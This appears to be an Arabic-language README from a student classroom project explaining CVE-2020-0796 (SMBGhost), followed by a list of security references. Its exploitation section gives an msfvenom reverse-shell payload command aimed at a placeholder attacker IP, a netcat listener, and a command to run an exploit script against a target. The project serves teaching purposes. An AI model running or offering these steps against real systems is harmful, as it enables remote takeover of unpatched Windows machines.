CVE-2020-0796
شرح CVE-2020-0796 والبحث في الثغرة الأمنية لمشروع الفصل الدراسي CENG325 للمبتدئين
كيفية الاستغلال؟
توليد الحمولة (payload) لعكس الصدفة (reverse shell):
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python
منفذ الاستماع:
nc -lvnp 5555
تنفيذ كود الاستغلال:
python3 exploit.py -ip TARGET_IP
مستودعات PoC
المراجع
- CVE-2020-0796: ثغرة تنفيذ التعليمات البرمجية عن بُعد القابلة للانتشار «Wormable» في. (13 مارس 2020). Tenable®. https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block
- «سأسأل جسدك»: SMBGhost RCE قبل المصادقة عبر إساءة استخدام بنى الوصول المباشر للذاكرة (Direct Memory Access). (20 أبريل 2020). Ricercasecurtiy.Blogspot.https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
- ثغرة تلف الذاكرة CVE-2020-0796 في خادم SMB في Windows 10 | FortiGuard Labs. (12 مارس 2020). مدونة Fortinet. https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server
- Team, K. (2 أبريل 2020). تحليل استغلال CVE-2020–0796 لـ Windows SMBv3 LPE POC. Medium.https://medium.com/@knownsec404team/cve-2020-0796-windows-smbv3-lpe-exploit-poc-analysis-c77569124c87
- CVE-2020-0796 –. (2020). مدونة Cyber Threat Insider. https://blog.sensecy.com/tag/cve-2020-0796/
أعضاء المشروع